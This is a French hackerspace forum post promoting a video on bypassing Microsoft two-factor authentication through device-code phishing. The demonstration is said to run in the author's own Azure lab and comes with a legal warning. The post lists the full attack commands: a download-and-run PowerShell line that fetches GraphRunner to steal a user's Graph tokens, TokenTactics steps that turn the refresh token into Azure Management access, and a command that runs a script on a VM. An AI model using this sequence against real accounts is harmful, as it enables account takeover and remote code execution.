INFOTHEMA

Section Hackerspace de l'association / Espace d'Expérimentation Technique => Sécurité des réseaux informatiques => Discussion démarrée par: Animateur le novembre 07, 2024, 07:57:33 pm

Titre: [Processus Thief] COMMENT LES HACKERS CONTOURNENT LA DOUBLE AUTHENTIFICATION
Posté par: Animateur le novembre 07, 2024, 07:57:33 pm
[Processus Thief] COMMENT LES HACKERS CONTOURNENT LA DOUBLE AUTHENTIFICATION




Vidéo en français sur le contournement de double authentification via l'authentification par Device Code sur un compte Microsoft.

Les démonstrations ont été réalisés sur un environnement Azure m'appartenant et dédié à cet effet.

Attention, le piratage est un délit.

L'ensemble des démonstrations inclues dans cette vidéo ont été effectuées dans un laboratoire dédiée à cet usage. Cette vidéo n'a pas vocation à encourager le hacking en dehors d'un cadre légal.


Le lien des formations d'Hamza  @zer0bullshit   :
https://www.hexadream.io/bootcamps-cybersecurite


    Pour obtenir le token Graph API de l'utilisateur :

IEX (iwr ' https://raw.githubusercontent.com/dafthack/GraphRunner/main/GraphRunner.ps1)
Get-GraphTokens -Device AndroidMobile -Browser Android

    Pour convertir le token Graph API en token Azure Management :

git clone https://github.com/f-bader/TokenTacticsV2
cd TokenTacticsV2
Import-Module .\TokenTactics.psm1
$refreshtoken = $tokens.refresh_token
Invoke-RefreshToAzureManagementToken -Domain nicrosoft.fr -RefreshToken $refreshtoken -Device AndroidMobile
Get-UserObjectID -Token $tokens -upn "youtube@nicrosoft.fr"
Connect-AzAccount -AccessToken $AzureManagementToken.access_token -AccountId "YOUR ACCOUNT ID"

    Pour lister les ressources :

Get-AzResource
Get-AzVM

    Pour exécuter une commande sur la VM :

notepad C:\Users\Utilisateur\TokenTacticsV2\youtube.ps1
Invoke-AzVMRunCommand -ResourceGroupName AZUREDEMO.TECH -Name RDP-01 -CommandId 'RunPowerShellScript' -ScriptPath C:\Users\Utilisateur\TokenTacticsV2\youtube.ps1